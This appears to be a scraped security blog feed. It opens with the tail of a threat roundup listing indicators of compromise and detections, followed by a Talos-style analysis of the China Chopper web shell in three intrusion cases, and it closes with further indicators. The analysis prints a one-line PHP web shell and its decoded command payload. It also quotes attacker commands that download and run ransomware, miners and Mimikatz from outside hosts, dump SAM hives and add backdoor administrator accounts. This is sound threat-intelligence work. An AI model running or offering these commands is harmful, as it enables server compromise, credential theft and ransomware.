                  www[.]cv4ygugpgj[.]com1
                  www[.]gnzs22h5ae[.]com1
                  www[.]ctabhfeith[.]com1
                  www[.]1ditgmvebu[.]com1
                  www[.]fhgbysko8w[.]com1
                  www[.]svu9es1kaz[.]com1
                  www[.]mbke6vrdrw[.]com1
                  www[.]y428zntdqc[.]com1
                  www[.]pb1ymjotdh[.]com1
                  www[.]fvi6gtygop[.]com1
                  www[.]nacci0plbn[.]com1
                  www[.]tfbjnm8ss8[.]com1
                  www[.]bf3ktyulcd[.]com1
                  www[.]7hcgj1c7yi[.]com1
                  www[.]vgdxer8o9b[.]com1
                  www[.]efk8v7cwgz[.]com1
                  www[.]b2oes11vip[.]com1
                  www[.]kxzgxtsgzo[.]com1
                  www[.]bqwdgq9z5o[.]com1
                  www[.]9ryvqouwz2[.]com1
                  *See JSON for more IOCs
                  Files and or directories createdOccurrences
                  <malware cwd>\old_<malware exe name>26

                  File Hashes

                  03ab0d4316dba014132279a8fa00672dd72dc52010eca751cca0ceeffee2a940 08728191591ac79aca64917792a74cba2c615487efd3a1194c9bcb774c7a2bbe 0e150456f2a44be79d12adc971076182752864d5c975135609dde6396edf8f92 1650c30e8c7a2441fddc5ae39022d063787d6e9bf31136e7b7a4da058d0e127b 16a955f71500c4b96bb4f3477f295b1e03891e37ed3f15814f3e10e986b41891 2baea5f5924c3797df0292430d7c221c29affc31ac9e892cddce75318cbd4050 38f55600b63cf4b1dead874bb77508dbb367289d4ed39bfa501f38ce6864c561 4529b2919ba158197448b5a407f6399a7ad659aa4b6bfe84a0a69012251957d6 455dda508bbc9bb449541a164536c6ff349036138ace35ecd8b41f328d124868 49328a8570131578e7db5efb056fdfe0918da3022207f6f11fce28cc3ada0dd4 502394f8fd57179a0d32c6c16ec67553841ceb2d2502287ad72b24cf3bbcb940 66c52a00e0bbfc2521431b1093459445abfc410ab365fe18eaa6be4d39b290e5 6a428aa727871fd11bbe5c47c28133042711634b984640e9e61d07281349ebe1 7dc0103c383cbb391561b17c1b5519ff6d742f157d24780b8b89802bf8aeaca8 8b9ffb6981205ab934f0b0014157853099952feb642733dfaf22a36915eaf9e2 8dccacaa54c3735a10c22b876351b6503f5bbc5dec99acd0ac45f72302ea0cc1 8e31d779fb1b41faea824379012dc111909efd6ba6fd22fc3792c42d0d750c30 91a6ff4ea2c0dcefc1afc65a73b0354ebca82938abf16be2fdf5d0260c6a9fae 989193f39f3e95b4451cfd992692dd0e4ae06dd53cbddaacc4cde0e647b6cd26 992956d43b605e5382e17455cfbb08970fd9c95b38bbfda96efb053f4c9212e3 a24985a6f7bff0429bfabf4b0a42f222c152b40669459c068774674c3d156038 adf49cd22dae9ee319da7f8dc03b24eac649f982048b5542f9b377f7beeeb1ac b1a5a9e9ddaec143aae51d0440d040ba98010724046c3a2b97e754d9784aa252 b492b4bbdc6a0661f22678cd3b80430279c29bd0eadbd947c1f44794dc56e99d c10735796a4e90c0266e5c127a0b9ae3361a966c0bc5f1460fb9f3db66a3c519
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Worm.Vobfus-7123957-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR
                  Value Name: Locked
                  12
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
                  Value Name: ShowSuperHidden
                  12
                  <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU 12
                  <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU
                  Value Name: NoAutoUpdate
                  12
                  <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 12
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: fxrab
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: saoavir
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: kiupouv
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: liupiuh
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: juvil
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: xeaoro
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: loxem
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: qetap
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: kauuyom
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: jaoguo
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: reugo
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: meerad
                  1
                  MutexesOccurrences
                  \BaseNamedObjects\A11
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  204[.]11[.]56[.]4811
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  ns1[.]timedate3[.]com11
                  ns1[.]timedate1[.]com11
                  ns1[.]timedate1[.]net11
                  ns1[.]timedate3[.]net11
                  ns1[.]timedate2[.]com11
                  ns1[.]timedate3[.]org11
                  ns1[.]timedate1[.]org11
                  ns1[.]timedate2[.]org11
                  Files and or directories createdOccurrences
                  \autorun.inf12
                  \System Volume Information.exe12
                  \$RECYCLE.BIN.exe12
                  \Secret.exe12
                  \Passwords.exe12
                  \Porn.exe12
                  \Sexy.exe12
                  E:\autorun.inf12
                  E:\$RECYCLE.BIN.exe12
                  E:\Passwords.exe12
                  E:\Porn.exe12
                  E:\Secret.exe12
                  E:\Sexy.exe12
                  E:\System Volume Information.exe12
                  E:\x.mpeg12
                  %HOMEPATH%\Passwords.exe12
                  %HOMEPATH%\Porn.exe12
                  %HOMEPATH%\Secret.exe12
                  %HOMEPATH%\Sexy.exe12
                  \<random, matching '[a-z]{4,7}'>.exe12
                  E:\<random, matching '[a-z]{4,7}'>.exe12
                  %HOMEPATH%\<random, matching '[a-z]{5,7}'>.exe12
                  %HOMEPATH%\RCX<random, matching '[A-F0-9]{3,4}'>.tmp9

                  File Hashes

                  0426c4c36a4793fcbd52f68d1c31620ed0500bc9999c8cae4be03cd7307299d8 7c7a93cc53493be184545ec97e05763dc16dd4fd6aff6da00b7cb3f00091427e cac1b67bfdfc89299cd8720ad33004591bd65fa7eae30ac9b41d8bba158b036c e0d2b56017c438c095800e361ccd7dc27991d0414ce90c0ba9e841220a7c4cc4 e30608735f6e814e40dfd878d4ef1f236660e6ebb4541d6496509493aec5058b f0cf9a4022dbd84685941b3043fd899c4411f9109ea1a09188190705deab8793 f7808bd853e4d50ea09aa31fe8f4c2593391e73f4e73e94a737ae9a074d04abb fca71f3c3fbf6bde78320761bef612e2d7ab278b86e8ae63a70a55708f9600fa fd225f346b89b87ed234350ee6aa8ee61816865b67369d45ac17b8aaf9bacbba fd283c48a116a0f724d0817ae861deb561da5c8890f82dbf1241e9e692730ad6 fd3c422dd572255bac29ff57d36f2fc619d8665ac81c822b12f24d2a338bc3ed fe7a44bb5409772b8386a585c6bdfce47fa978d29cf0203eb9d547490daa776c

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella




                  Exploit Prevention

                  Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
                  Madshi injection detected - (1156)
                  Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
                  CVE-2019-0708 detected - (1075)
                  An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
                  Kovter injection detected - (580)
                  A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
                  Process hollowing detected - (526)
                  Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
                  Dealply adware detected - (244)
                  DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
                  Excessively long PowerShell command detected - (214)
                  A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
                  Gamarue malware detected - (53)
                  Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
                  Installcore adware detected - (34)
                  Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
                  Atom Bombing code injection technique detected - (25)
                  A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
                  PowerShell file-less infection detected - (15)
                  A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.

                  China Chopper still active 9 years later

                  $
                  0
                  0
                  By Paul Rascagneres and Vanja Svajcer.

                  Introduction

                  Threats will commonly fade away over time as they're discovered, reported on, and detected. But China Chopper has found a way to stay relevant, active and effective nine years after its initial discovery. China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target. Several threat groups have used China Chopper, and over the past two years, we've seen several different campaigns utilizing this web shell and we chose to document three most active campaigns in this blog post.

                  We decided to take a closer look at China Chopper after security firm Cybereason reported on a massive attack against telecommunications providers called "Operation Soft Cell," which reportedly utilized China Chopper. Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017, which shows that even nine years after its creation, attackers are using China Chopper without significant modifications.

                  This web shell is widely available, so almost any threat actor can use. This also means it's nearly impossible to attribute attacks to a particular group using only presence of China Chopper as an indicator.

                  The usage of China Chopper in recent campaigns proves that a lot of old threats never really die, and defenders on the internet need to be looking out for malware both young and old.


                  What is China Chopper?

                  China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool. The web shell works on different platforms, but in this case, we focused only on compromised Windows hosts. China Chopper is a tool that has been used by some state-sponsored actors such as Leviathan and Threat Group-3390, but during our investigation we've seen actors with varying skill levels.

                  In our research, we discovered both Internet Information Services (IIS) and Apache web servers compromised with China Chopper web shells. We do not have additional data about how the web shell was installed, but there are several web application frameworks such as older versions of Oracle WebLogic or WordPress that may have been targeted with known remote code execution or file inclusion exploits.

                  China Chopper provides the actor with a simple GUI that allows them to configure servers to connect to and generate server-side code that must be added to the targeted website code in order to communicate.

                  China Chopper GUI

                  The server-side code is extremely simple and contains, depending on the application platform, just a single line of code. The backdoor supports .NET Active Server Pages or PHP.

                  Here is an example of a server-side code for a compromised PHP application:

                  <?php @eval($_POST['test']);?>

                  We cannot be sure if the simplicity of the server code was a deliberate decision on the part of the China Chopper developers to make detection more difficult, but using pattern matching on such as short snippet may produce some false positive detections.

                  The China Chopper client communicates with affected servers using HTTP POST requests. The only function of the server-side code is to evaluate the request parameter specified during the configuration of the server code in the client GUI. In our example, the expected parameter name is "test." The communication over HTTP can be easily spotted in the network packet captures.

                  China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of 'netstat an|find "ESTABLISHED."' and it is very likely that this command will be seen in process creation logs on affected systems.

                  China Chopper's first suggested Terminal command

                  When we analyze the packet capture, we can see that the parameter "test" contains another eval statement.

                  Depending on the command, the client will submit a certain number of parameters, z0 to zn. All parameters are encoded with a standard base64 encoder before submission. Parameter z0 always contains the code to parse other parameters, launch requested commands and return the results to the client.

                  test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D

                  Encoded China Chopper POST request with parameters

                  In this request, the decoded parameters are:
                  z0 - @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
                  ret={$ret}
                  ":"";;echo("|<-");die();

                  z1 - cmd

                  z2 - cd /d "C:\xampp\htdocs\dashboard\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]

                  The end of the command "&echo [S]&cd&echo [E]" seems to be present in all virtual terminal requests and may be used as a reliable indicator to detect China Chopper activity in packet captures or behavioral logs.

                  Apart from the terminal, China Chopper includes a file manager (with the ability to create directories, download files and change file metadata), a database manager and a rudimentary vulnerability scanner.

                  What follows is our view into three different compromises, each with different goals, tools, techniques and likely different actors.

                  Timeline of the observed case studies

                  Case study No. 1: Espionage context

                  We identified the usage of China Chopper in a couple of espionage campaigns. Here, we investigate a campaign targeting an Asian government organization. In this campaign, China Chopper was used in the internal network, installed on a few web servers used to store potentially confidential documents.

                  The purpose of the attacker was to obtain documents and database copies. The documents were automatically compressed using WinRAR:

                  cd /d C:\Windows\Working_Directory\
                  renamed_winrar a -m3 -hp19_Characters_Complex_Password -ta[date] -n*.odt -n*.doc -n*.docx -n*.pdf -n*.xls -n*.xlsx -n*.ppt -n*.pptx -r c:\output_directory\files.rar c:\directory_to_scan\

                  This command is used to create an archive containing documents modified after the date put as an argument. The archives are protected with a strong password containing uppercase, lowercase and special characters. The passwords were longer than 15 characters.

                  We assume the attacker ran this command periodically in order to get only new documents and minimize the quantity of exfiltrated data.

                  On the same target, we identified additional commands executed with China Chopper using WinRAR:

                  rar a -inul -ed -r -m3 -taDate -hp<profanity> ~ID.tmp c:\directory_to_scan

                  China Chopper is a public hacking tool and we cannot tell if in this case the attacker is the same actor as before. But the rar command line here is sufficiently different to note that it could be a different actor. The actor used an offensive phrase for a password, which is why we've censored it here.

                  The attacker deployed additional tools to execute commands on the system:

                  C:\windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\windows\temp\Document.csproj  /p:AssemblyName=C:\windows\temp\downloader.png /p:ScriptFile=C:\windows\temp\downloader.dat /p:Key=27_characters_key > random.tmp

                  MSBuild.exe is used to compile and execute a .NET application with two arguments: the ScriptFile argument contains a PowerShell script encrypted with the value of the key argument. Here is the .NET code:

                  .NET loader code

                  The .NET loader supports encrypted files or URLs as the script argument. If the operator uses an HTTP request, the loader downloads the payload with one of the hardcoded User-Agents. The loader decrypts the downloaded file and executes it:

                  Hardcoded User-Agent strings

                  In our case, the purpose of the decrypted payload was to perform a database dump:

                  powershell.exe -exe bypass -nop -w hidden -c Import-Module C:\windows\help\help\helper.ps1;
                  Run-MySQLQuery -ConnectionString 'Server=localhost;Uid=root;Pwd=;database=DBName;
                  Convert Zero Datetime=True' -Query 'Select * from table where UID > 'Value' -Dump

                  The "where UID" condition in the SQL query has the same purpose as the date in the previous WinRAR command. We assume the attacker performs the query periodically and does not want to dump the entire database, but only the new entries. It is interesting to see that after dumping the data, the attacker checks if the generated file is available and if it contains any data:

                  dir /O:D c:\working_directory\db.csv
                  powershell -nop -exec bypass Get-Content "c:\working_directory\db.csv" | Select-Object -First 10

                  How are the file archives and the database dumps exfiltrated? Since the targeted server is in an internal network, the attacker simply maps a local drive and copies the file to it.

                  cd /d C:\working_directory\
                  net use \192.168.0.10\ipc$ /user:USER PASSWORD
                  move c:\working_directory\db.csv \192.168.0.10\destination_directory

                  The attacker must have access to the remote system in order to exfiltrate data. We already saw the usage of a HTTP tunnel tool to create a network tunnel between the infected system and a C2 server.

                  Case No. 2: Multi-purpose campaign

                  We observed another campaign targeting an organisation located in Lebanon. While our first case describes a targeted campaign with the goal to exfiltrate data affecting internal servers, this one is the opposite: an auxiliary public web site compromised by several attackers for different purposes.

                  We identified actors trying to deploy ransomware on the vulnerable server using China Chopper. The first attempt was Sodinokibi ransomware:

                  certutil.exe -urlcache -split -f hxxp://188.166.74[.]218/radm.exe C:\Users\UserA\AppData\Local\Temp\radm.exe

                  The second delivered the Gandcrab ransomware:

                  If($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64'){ 
                  Start-Process -FilePath "$Env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -argument "IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33'));
                  Invoke-ACAXGZFTTDUDKY;
                  Start-Sleep -s 1000000;"
                  } else {
                  IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33'));
                  Invoke-ACAXGZFTTDUDKY;
                  Start-Sleep -s 1000000;
                  }

                  Here is the script hosted on Pastebin:

                  Reflective loader downloaded from pastebin.com

                  The script executes a hardcoded PE file located — Gandcrab —at the end of the script using a reflective DLL-loading technique.

                  In addition to the ransomware, we identified another actor trying to execute a Monero miner on the vulnerable server with China Chopper:

                  Powershell -Command -windowstyle hidden -nop -enc -iex(New-Object Net.WebClient).DownloadString('hxxp://78.155.201[.]168:8667/6HqJB0SPQqbFbHJD/init.ps1')

                  Here's a look at the miner configuration:

                  Monero miner configuration

                  Some of the detected activity may have been manual and performed in order to get OS credentials.

                  Trying to get the registry:

                  reg save hklm\sam sam.hive 
                  reg save hklm\system system.hive
                  reg save hklm\security security.hive

                  Using Mimikatz (with a few hiccups along the way):

                  powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
                  Invoke-Mimikatz >>c:\1.txt

                  powershell IEX","(New-Object","Net.WebClient).DownloadString('hxxp://is[.]gd/oeoFuI'); Invoke-Mimikatz -DumpCreds

                  C:\Windows\System32WindowsPowerShell\v1.0\powershell.exe IEX 

                  (New-Object","Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
                  Invoke-Mimikatz

                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [Environment]::Is64BitProcess

                  powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
                  Invoke-Mimikatz >>c:\1.txt

                  Attempting to dump password hashes using a PowerShell module and the command line:

                  IEX (New-Object 

                  Net.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/master/Get-PassHashes.ps1');Get-PassHashes;

                  The attackers also tried procdump64.exe on lsass.exe to get the local credentials stored in memory. In addition to the multiple attempts to dump the credential, the attackers had to deal with typos: missed spaces, wrong commands or letters switching.

                  One of the actors successfully acquired the credentials and tried to pivot internally by using the credentials and the "net use" commands.

                  Finally, several remote access tools such as Gh0stRAT and Venom multi-hop proxy were deployed on the machine, as well as a remote shell written purely in PowerShell.

                  Case No. 3: Web hosting providers compromised

                  In one campaign, we discovered an Asian web-hosting provider under attack, with the most significant compromise spanning several Windows servers over a period of 10 months. Once again, we cannot be sure if this was a single actor or multiple groups, since the activities differ depending on the attacked server. We show just a subset of observed activities.

                  Server 1

                  Generally, the attackers seek to create a new user and then add the user to the group of users with administrative privileges, presumably to access and modify other web applications hosted on a single physical server.

                  cd /d C:\compromisedappdirectory&net user user pass /add
                  cd /d C:\compromisedappdirectory&net localgroup administrattors user /add

                  Notice the misspelling of the word "administrators." The actor realizes that the addition of the user was not successful and attempts a different technique. They download and install an archive containing executables and trivially modified source code of the password-stealing tool "Mimikatz Lite" as GetPassword.exe.

                  The tool investigates the Local Security Authority Subsystem memory space in order to find, decrypt and display retrieved passwords. The only change, compared with the original tool is that actors change the color and the code page of the command window. The color is changed so that green text is displayed on a black background and the active console code page is changed to the Chinese code page 936.

                  Finally, the actor attempts to dump the database of a popular mobile game "Clash of Kings," possibly hosted on a private server.

                  Server 2

                  An actor successfully tested China Chopper on a second server and stopped the activity. However, we also found another Monero cryptocurrency miner just as we found commodity malware on other systems compromised with China Chopper.

                  The actors first reset the Access Control List for the Windows temporary files folder and take ownership of the folder. They then allow the miner executable through the Windows Firewall and finally launch the mining payload.

                  C:\Windows\system32\icacls.exe C:\Windows\Temp /Reset /T
                  C:\Windows\system32\takeown.exe /F C:\Windows\Temp
                  C:\Windows\system32\netsh.exe Firewall Add AllowedProgram C:\Windows\Temp\lsass.eXe Windows Update Enable
                  C:\Windows\Temp\lsass.eXe

                  Server 3

                  The attack on this server starts by downloading a number of public and private tools, though we were not able to retrieve them.

                  The actor attempts to exploit CVE-2018–8440— an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit.

                  cd /d C:\directoryofcompromisedapp&rundll32 C:\directoryofcompromisedapp\ALPC-TaskSched-LPE.dll,a

                  The attacker launches several custom tools and an available tool that attempts to create a new user iis_uses and change DACLs to allow the users to modify certain operating system objects.

                  The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server. This is likely done to compromise other sites or to run a web defacement campaign.

                  cacls \. C:\path_to_a_website /T /E /C /G Everyone:F

                  Finally, the actor attempts to launch Powershell Mimikatz loader to get more credentials from memory and save the credentials into a text file:

                  powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz|Out-File
                  -Encoding ASCII outputfile.txt

                  Server 4

                  The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server.

                  Once the privilege escalation was successful, the actor adds a new user account and adds the account to the administrative group.

                  net user admin admin /ad
                  net localgroup administrators admin /ad

                  The attacker next logs on to the server with a newly created user account and launches a free tool replacestudio32.exe, a GUI utility that easily searches through text-based files and performs replacement with another string. Once again, this could be used to affect all sites hosted on the server or simply deface pages.

                  Conclusion

                  Insecure web applications provide an effective entry point for attackers and allow them to install additional tools such as web shells, conduct reconnaissance and pivot to other systems.

                  Although China Chopper is an old tool, we still see it being used by attackers with various goals and skill levels and in this post we showed some of the common tools, techniques and processes employed in three separate breaches. Because it is so easy to use, it's impossible to confidently connect it to any particular actor or group.

                  In our research we documented three separate campaigns active over a period of several months. This corroborates the claim that an average time to detect an intrusion is over 180 days and implies that defenders should approach building their security teams and processes around an assumption that the organization has already been breached. It is crucial that an incident response team should have a permission to proactively hunt for breaches, not only to respond to alerts raised by automated detection systems or escalated by the first line security analysts.

                  When securing the infrastructure it is important to keep internal as well as external facing web servers, applications, and frameworks up to date with the latest security patches to mitigate risk of compromise with already known exploits.

                  Despite the age, China Chopper is here to stay, and we will likely see it in the wild going forward.

                  Coverage

                  Intrusion prevention systems such as SNORT® provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

                  Additional ways our customers can detect and block these threats are listed below.



                  Cisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                  Email Security can block malicious emails sent by threat actors as part of their campaign.

                  Network Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                  AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                  Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                  Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                  IOCs

                  China Chopper clients

                  9065755708be18d538ae1698b98201a63f735e3d8a597419588a16b0a72c249a
                  c5bbb7644aeaadc69920de9a31042920add12690d3a0a38af15c8c76a90605ef
                  b84cdf5f8a4ce4492dd743cb473b1efe938e453e43cdd4b4a9c1c15878451d07
                  58b2590a5c5a7bf19f6f6a3baa6b9a05579be1ece224fccd2bfa61224a1d6abc

                  Case study 1

                  Files

                  b1785560ad4f5f5e8c62df16385840b1248fe1be153edd0b1059db2308811048 - downloader
                  fe6b06656817e288c2a391cbe8f5c7f1fa0f0849d9446f9350adf7100aa7b447 - proxy
                  28cbc47fe2975fbde7662e56328864e28fe6de4b685d407ad8a2726ad92b79e5 - downloader dll
                  c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e - nbtscan tool
                  dbe8ada2976ee00876c8d61e5a92cf9c980ae4b3fce1d9016456105a2680776c - Miner

                  Legitimate tools

                  d76c3d9bb0d8e0152db37bcfe568c5b9a4cac00dd9c77c2f607950bbd25b30e0 - rar
                  46c3e073daa4aba552f553b914414b8d4419367df63df8a0d2cf4db2d835cdbd - renamed rar
                  96f478f709f4f104822b441ae3fa82c95399677bf433ac1a734665f374d28c84 - renamed rar

                  IP addresses

                  69.165.64.100
                  59.188.255.184
                  154.211.12.153
                  185.234.218.248

                  Case study 2

                  Files

                  02d635f9dfc80bbd9e8310606f68120d066cec7db8b8f28e19b3ccb9f4727570 - Gandcrab loader
                  1c3d492498d019eabd539a0774adfc740ab62ef0e2f11d13be4c00635dccde33 - Gandcrab
                  219644f3ece78667293a035daf7449841573e807349b88eb24e2ba6ccbc70a96 - Miner/dropper
                  4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38 - massscan dropped by the miner
                  a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb - remote exploit
                  919270ef1c58cc032bb3417a992cbb676eb15692f16e608dcac48e536271373a - multihop Venom proxy

                  URLs

                  hxxp://101.78.142.74:8001/xavg/javae[.]exe
                  hxxp://107.181.160.197/win/3p/checking[.]ps1
                  hxxp://107.182.28.64/t0[.]txt
                  hxxp://139.180.199.167:1012/update[.]ps1
                  hxxp://172.96.241.10:80/a
                  hxxp://185.228.83.51/config[.]c
                  hxxp://188.166.74.218/radm[.]exe
                  hxxp://188.166.74.218/untitled[.]exe
                  hxxp://198.13.42.229:8667/6HqJB0SPQqbFbHJD/init[.]ps1
                  hxxp://202.144.193.177/1[.]ps1
                  hxxp://43.245.222.57:8667/6HqJB0SPQqbFbHJD/init[.]ps1
                  hxxp://78.155.201.168:8667/6HqJB0SPQqbFbHJD/init[.]ps1
                  hxxp://is.gd/oeoFuI
                  hxxps://pastebin.com/raw/Hd7BmJ33
                  hxxps://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz[.]ps1
                  hxxp://fid.hognoob.se/download[.]exe
